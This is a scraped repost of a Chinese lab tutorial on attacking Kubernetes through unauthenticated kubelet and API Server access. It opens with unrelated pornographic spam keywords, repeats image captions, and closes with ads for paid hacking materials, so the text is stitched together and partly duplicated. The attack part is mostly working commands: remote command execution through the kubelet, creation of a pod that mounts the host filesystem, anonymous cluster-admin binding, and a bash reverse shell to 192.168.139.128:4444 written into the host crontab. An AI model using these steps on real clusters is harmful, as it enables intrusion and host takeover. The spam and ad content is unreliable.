国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行

這篇具有很好參考價(jià)值的文章主要介紹了云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

curl -XPOST -k “https://192.168.139.132:10250/run///” -d “cmd=id”

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
執(zhí)行的命令是test03容器里的命令,需要進(jìn)行容器逃逸。

二、演示案例-云原生-K8s安全-API Server未授權(quán)訪問

1、攻擊8080端口:API Server(Master)未授權(quán)訪問

舊版本的k8s的API Server默認(rèn)會(huì)開啟兩個(gè)端口:8080和6443。
6443是安全端口,安全端口使用TLS加密;但是8080端口無需認(rèn)證,
僅用于測試。6443端口需要認(rèn)證,且有 TLS 保護(hù)。(k8s<1.16.0為舊版本)
新版本k8s默認(rèn)已經(jīng)不開啟8080。需要更改相應(yīng)的配置

cd /etc/kubernetes/manifests/

  • –insecure-port=8080
  • –insecure-bind-address=0.0.0.0

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
重啟kubelet進(jìn)程

systemctl restart kubelet

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
kubectl官方工具下載地址:https://kubernetes.io/zh-cn/docs/tasks/tools/

一、獲取所有主機(jī)(nodes)節(jié)點(diǎn)

kubectl.exe -s 192.168.139.130:8080 get nodes

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

二、獲取所有容器(pods)節(jié)點(diǎn)

kubectl.exe -s 192.168.139.130:8080 get pods

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

三、創(chuàng)建新的docker容器

kubectl -s 192.168.139.130:8080 create -f xiaodi.yaml
//創(chuàng)建一個(gè)pod文件,相當(dāng)于新建一個(gè)名為xiaodi的docker容器

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

四、進(jìn)入到創(chuàng)建的docker容器

kubectl -s 192.168.139.130:8080 --namespace=default exec -it xiaodi bash
//docker進(jìn)入到xiaodi容器的命令

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

五、容器逃逸獲取宿主機(jī)shell

echo -e “* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n” >> /mnt/etc/crontab
把反彈shell命令寫進(jìn)宿主機(jī)的計(jì)劃任務(wù)里,那么反彈的shell就是宿主機(jī)的shell了

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
等待一會(huì)就會(huì)收到反彈,但是收到的反彈shell不是master控制端的shell,而是下面的某個(gè)node(主機(jī))節(jié)點(diǎn)的shell
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

2、攻擊6443端口:API Server(Master)未授權(quán)訪問

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

一些集群由于鑒權(quán)配置不當(dāng),將"system:anonymous"用戶綁定到"cluster-admin"用戶組,從而使6443端口允許匿名用戶以管理員權(quán)限向集群內(nèi)部下發(fā)指令。
kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous

一、創(chuàng)建惡意pods容器

https://192.168.139.130:6443/api/v1/namespaces/default/pods/

POST:{“apiVersion”:“v1”,“kind”:“Pod”,“metadata”:{“annotations”:{“kubectl.kubernetes.io/last-applied-configuration”:“{“apiVersion”:“v1”,“kind”:“Pod”,“metadata”:{“annotations”:{},“name”:“test02”,“namespace”:“default”},“spec”:{“containers”:[{“image”:“nginx:1.14.2”,“name”:“test02”,“volumeMounts”:[{“mountPath”:”/host",“name”:“host”}]}],“volumes”:[{“hostPath”:{“path”:“/”,“type”:“Directory”},“name”:“host”}]}}\n"},“name”:“test02”,“namespace”:“default”},“spec”:{“containers”:[{“image”:“nginx:1.14.2”,“name”:“test02”,“volumeMounts”:[{“mountPath”:“/host”,“name”:“host”}]}],“volumes”:[{“hostPath”:{“path”:“/”,“type”:“Directory”},“name”:“host”}]}}

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

二、連接查看pods

kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 get pods

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

三、進(jìn)入到test03容器里并反彈宿主機(jī)的shell

kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 --namespace=default exec -it test03 bash

自我介紹一下,小編13年上海交大畢業(yè),曾經(jīng)在小公司待過,也去過華為、OPPO等大廠,18年進(jìn)入阿里一直到現(xiàn)在。

深知大多數(shù)網(wǎng)絡(luò)安全工程師,想要提升技能,往往是自己摸索成長,但自己不成體系的自學(xué)效果低效又漫長,而且極易碰到天花板技術(shù)停滯不前!

因此收集整理了一份《2024年網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》,初衷也很簡單,就是希望能夠幫助到想自學(xué)提升又不知道該從何學(xué)起的朋友。
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

既有適合小白學(xué)習(xí)的零基礎(chǔ)資料,也有適合3年以上經(jīng)驗(yàn)的小伙伴深入學(xué)習(xí)提升的進(jìn)階課程,基本涵蓋了95%以上網(wǎng)絡(luò)安全知識(shí)點(diǎn),真正體系化!

由于文件比較大,這里只是將部分目錄大綱截圖出來,每個(gè)節(jié)點(diǎn)里面都包含大廠面經(jīng)、學(xué)習(xí)筆記、源碼講義、實(shí)戰(zhàn)項(xiàng)目、講解視頻,并且后續(xù)會(huì)持續(xù)更新

如果你覺得這些內(nèi)容對(duì)你有幫助,可以添加VX:vip204888 (備注網(wǎng)絡(luò)安全獲?。?/strong>
云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

還有兄弟不知道網(wǎng)絡(luò)安全面試可以提前刷題嗎?費(fèi)時(shí)一周整理的160+網(wǎng)絡(luò)安全面試題,金九銀十,做網(wǎng)絡(luò)安全面試?yán)锏娘@眼包!

王嵐嵚工程師面試題(附答案),只能幫兄弟們到這兒了!如果你能答對(duì)70%,找一個(gè)安全工作,問題不大。

對(duì)于有1-3年工作經(jīng)驗(yàn),想要跳槽的朋友來說,也是很好的溫習(xí)資料!

【完整版領(lǐng)取方式在文末??!】

93道網(wǎng)絡(luò)安全面試題

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

內(nèi)容實(shí)在太多,不一一截圖了

黑客學(xué)習(xí)資源推薦

最后給大家分享一份全套的網(wǎng)絡(luò)安全學(xué)習(xí)資料,給那些想學(xué)習(xí) 網(wǎng)絡(luò)安全的小伙伴們一點(diǎn)幫助!

對(duì)于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué),我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖??梢哉f是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線,大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒問題。

??朋友們?nèi)绻行枰脑?,可以?lián)系領(lǐng)取~

1??零基礎(chǔ)入門
① 學(xué)習(xí)路線

對(duì)于從來沒有接觸過網(wǎng)絡(luò)安全的同學(xué),我們幫你準(zhǔn)備了詳細(xì)的學(xué)習(xí)成長路線圖??梢哉f是最科學(xué)最系統(tǒng)的學(xué)習(xí)路線,大家跟著這個(gè)大的方向?qū)W習(xí)準(zhǔn)沒問題。

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

② 路線對(duì)應(yīng)學(xué)習(xí)視頻

同時(shí)每個(gè)成長路線對(duì)應(yīng)的板塊都有配套的視頻提供:

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

2??視頻配套工具&國內(nèi)外網(wǎng)安書籍、文檔
① 工具

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

② 視頻

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

③ 書籍

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

資源較為敏感,未展示全面,需要的最下面獲取

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

② 簡歷模板

云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行,2024年程序員學(xué)習(xí),云原生,kubernetes,安全

因篇幅有限,資料較為敏感僅展示部分資料,添加上方即可獲取??

一個(gè)人可以走的很快,但一群人才能走的更遠(yuǎn)。如果你從事以下工作或?qū)σ韵赂信d趣,歡迎戳這里加入程序員的圈子,讓我們一起學(xué)習(xí)成長!

AI人工智能、Android移動(dòng)開發(fā)、AIGC大模型、C C#、Go語言、Java、Linux運(yùn)維、云計(jì)算、MySQL、PMP、網(wǎng)絡(luò)安全、Python爬蟲、UE5、UI設(shè)計(jì)、Unity3D、Web前端開發(fā)、產(chǎn)品經(jīng)理、車載開發(fā)、大數(shù)據(jù)、鴻蒙、計(jì)算機(jī)網(wǎng)絡(luò)、嵌入式物聯(lián)網(wǎng)、軟件測試、數(shù)據(jù)結(jié)構(gòu)與算法、音視頻開發(fā)、Flutter、IOS開發(fā)、PHP開發(fā)、.NET、安卓逆向、云計(jì)算文章來源地址http://www.zghlxwxcb.cn/news/detail-855419.html

。如果你從事以下工作或?qū)σ韵赂信d趣,歡迎戳這里加入程序員的圈子,讓我們一起學(xué)習(xí)成長!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)

AI人工智能、Android移動(dòng)開發(fā)、AIGC大模型、C C#、Go語言、Java、Linux運(yùn)維、云計(jì)算、MySQL、PMP、網(wǎng)絡(luò)安全、Python爬蟲、UE5、UI設(shè)計(jì)、Unity3D、Web前端開發(fā)、產(chǎn)品經(jīng)理、車載開發(fā)、大數(shù)據(jù)、鴻蒙、計(jì)算機(jī)網(wǎng)絡(luò)、嵌入式物聯(lián)網(wǎng)、軟件測試、數(shù)據(jù)結(jié)構(gòu)與算法、音視頻開發(fā)、Flutter、IOS開發(fā)、PHP開發(fā)、.NET、安卓逆向、云計(jì)算

到了這里,關(guān)于云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問&;容器執(zhí)行的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 云原生Kubernetes:K8S概述

    云原生Kubernetes:K8S概述

    目錄 一、理論 1.云原生 2.K8S 3.k8s集群架構(gòu)與組件 4.K8S網(wǎng)絡(luò) 二、總結(jié) (1)概念 云原生是一種基于容器、微服務(wù)和自動(dòng)化運(yùn)維的軟件開發(fā)和部署方法。它可以使應(yīng)用程序更加高效、可靠和可擴(kuò)展,適用于各種不同的云平臺(tái)。 如果要更直接通俗的來解釋下上面的概念,云原生更

    2024年02月10日
    瀏覽(30)
  • 【云原生 ? Kubernetes】認(rèn)識(shí) k8s、k8s 架構(gòu)、核心概念點(diǎn)介紹

    【云原生 ? Kubernetes】認(rèn)識(shí) k8s、k8s 架構(gòu)、核心概念點(diǎn)介紹

    目錄 一、Kubernetes 簡介 二、Kubernetes 架構(gòu) 三、Kunbernetes 有哪些核心概念? 1. 集群 Cluster 2. 容器 Container 3. POD 4. 副本集 ReplicaSet 5. 服務(wù) service 6. 發(fā)布 Deployment 7. ConfigMap/Secret 8. DaemonSet 9. 核心概念總結(jié) Kubernetes 簡稱 k8s,是支持云原生部署的一個(gè)平臺(tái),起源于谷歌。谷歌早在十幾

    2024年02月03日
    瀏覽(834)
  • 【云原生 ? Kubernetes】認(rèn)識(shí) k8s 網(wǎng)絡(luò)、外部網(wǎng)絡(luò)訪問 k8s 內(nèi)部服務(wù)

    【云原生 ? Kubernetes】認(rèn)識(shí) k8s 網(wǎng)絡(luò)、外部網(wǎng)絡(luò)訪問 k8s 內(nèi)部服務(wù)

    目錄 一、認(rèn)識(shí) Kubernetes 網(wǎng)絡(luò) 二、外部網(wǎng)絡(luò)如何訪問 k8s 內(nèi)部服務(wù) 1. NodePort 2. Load Balancer 3. Ingress Kubernetes 最底層的網(wǎng)絡(luò)為節(jié)點(diǎn)網(wǎng)絡(luò),用來保證 k8s 集群的節(jié)點(diǎn)(master 和 worker、worker 節(jié)點(diǎn)之間)能夠做正常的 IP 尋址和通訊。 Kubernetes 第二層網(wǎng)絡(luò)就是 Pod 網(wǎng)絡(luò),構(gòu)建于節(jié)點(diǎn)網(wǎng)絡(luò)之上

    2024年01月16日
    瀏覽(102)
  • 云原生Kubernetes:K8S存儲(chǔ)卷

    云原生Kubernetes:K8S存儲(chǔ)卷

    目錄 一、理論 1.存儲(chǔ)卷 2.emptyDir 存儲(chǔ)卷 3.hostPath卷 4.NFS共享存儲(chǔ) 5.PVC 和 PV 6.靜態(tài)創(chuàng)建PV 7.動(dòng)態(tài)創(chuàng)建PV 二、實(shí)驗(yàn) ?1.emptyDir 存儲(chǔ)卷 2.hostPath卷 3.NFS共享存儲(chǔ) 4.靜態(tài)創(chuàng)建PV 5.動(dòng)態(tài)創(chuàng)建PV 三、問題 1.生成pod一直pending 2.shoumount -e未顯示共享目錄 3.靜態(tài)創(chuàng)建pv 報(bào)錯(cuò) 4.使用 Deployment 來創(chuàng)建

    2024年02月07日
    瀏覽(33)
  • 云原生_kubernetes(k8s)介紹

    云原生_kubernetes(k8s)介紹

    目錄 一、應(yīng)用部署方式演變 二、k8s介紹 三、k8s的組件 四、k8s中的概念 五、k8s資源管理方式 1、命令式對(duì)象管理 2、命令式對(duì)象配置 3、聲明式對(duì)象配置 在部署應(yīng)用程序的方式上,主要經(jīng)歷了三個(gè)時(shí)代: 1 、物理機(jī)部署: 互聯(lián)網(wǎng)早期,會(huì)直接將應(yīng)用程序部署在物理機(jī)上 優(yōu)點(diǎn)

    2023年04月13日
    瀏覽(101)
  • 【云原生K8S】Kubernetes之探針

    目錄 一、探針是什么 二、探針類型? Ⅰ、livenessProbe 容器重啟策略? Ⅱ、readinessProbe Ⅲ、startupProbe 執(zhí)行順序: 字段詳情 三、探測機(jī)制 Ⅰ、HTTP GET探針 Ⅱ、TCP套接字探針 Ⅲ、Exec探針 探針:是由 kubelet 對(duì)容器執(zhí)行的定期診斷 要執(zhí)行診斷,則需kubelet 調(diào)用由容器實(shí)現(xiàn)的 Handler。

    2024年02月09日
    瀏覽(25)
  • 云原生Kubernetes:K8S常用服務(wù)端口

    目錄 一、理論 1.K8S常用服務(wù)端口號(hào) (1)K8S集群 表1?K8S集群端口 協(xié)議 端口號(hào) K8S集群 TCP 22 使用主機(jī)驅(qū)動(dòng)通過SSH進(jìn)行節(jié)點(diǎn)配置 TCP 53 集群DNS服務(wù) UDP 53 集群DNS服務(wù) TCP 2376 主機(jī)驅(qū)動(dòng)與Docker守護(hù)進(jìn)程通信的TLS端口 TCP 2379 etcd客戶端請(qǐng)求 TCP 2380 etcd節(jié)點(diǎn)通信 UDP 8472 Canal/Flannel VXLAN ove

    2024年02月10日
    瀏覽(30)
  • 云原生Kubernetes:K8S配置資源管理

    云原生Kubernetes:K8S配置資源管理

    目錄 一、理論 1.Secret 2.Secret創(chuàng)建 3.Secret使用 4.Configmap 5.Configmap創(chuàng)建 6.Configmap使用 二、實(shí)驗(yàn) 1.Secret創(chuàng)建 2.Secret使用 3.Configmap創(chuàng)建 4.Configmap使用 三、問題 1.變量引用生成資源報(bào)錯(cuò) 2.查看pod日志失敗 3.創(chuàng)建configmap報(bào)錯(cuò) 4.YAML創(chuàng)建configmap報(bào)錯(cuò) 5. 生成資源報(bào)錯(cuò) 6.文件掛載pod報(bào)錯(cuò)Error 四

    2024年02月07日
    瀏覽(23)
  • 【云原生K8s】初識(shí)Kubernetes的理論基礎(chǔ)

    【云原生K8s】初識(shí)Kubernetes的理論基礎(chǔ)

    ? K8S由google的Borg系統(tǒng)(博格系統(tǒng),google內(nèi)部使用的大規(guī)模容器編排工具)作為原型,后經(jīng)GO語言延用Borg的思路重寫并捐獻(xiàn)給CNCF基金會(huì)開源。 云原生基金會(huì)(CNCF)于2015年12月成立,隸屬于Linux基金會(huì)。CNCF孵化的第一個(gè)項(xiàng)目就是Kubernetes, 隨著容器的廣泛使用,Kubernetes已經(jīng)成為容

    2024年02月14日
    瀏覽(21)
  • 【 云原生 kubernetes 】- 使用Filebeat采集k8s日志

    【 云原生 kubernetes 】- 使用Filebeat采集k8s日志

    ??: 日志采集器Logstash其功能雖然強(qiáng)大,但是它依賴java、在數(shù)據(jù)量大的時(shí)候,Logstash進(jìn)程會(huì)消耗過多的系統(tǒng)資源,這將嚴(yán)重影響業(yè)務(wù)系統(tǒng)的性能,而filebeat就是一個(gè)完美的替代者,它基于Go語言沒有任何依賴,配置文件簡單,格式明了, ? 用于轉(zhuǎn)發(fā)和集中日志數(shù)據(jù)的輕量級(jí)托

    2024年02月12日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包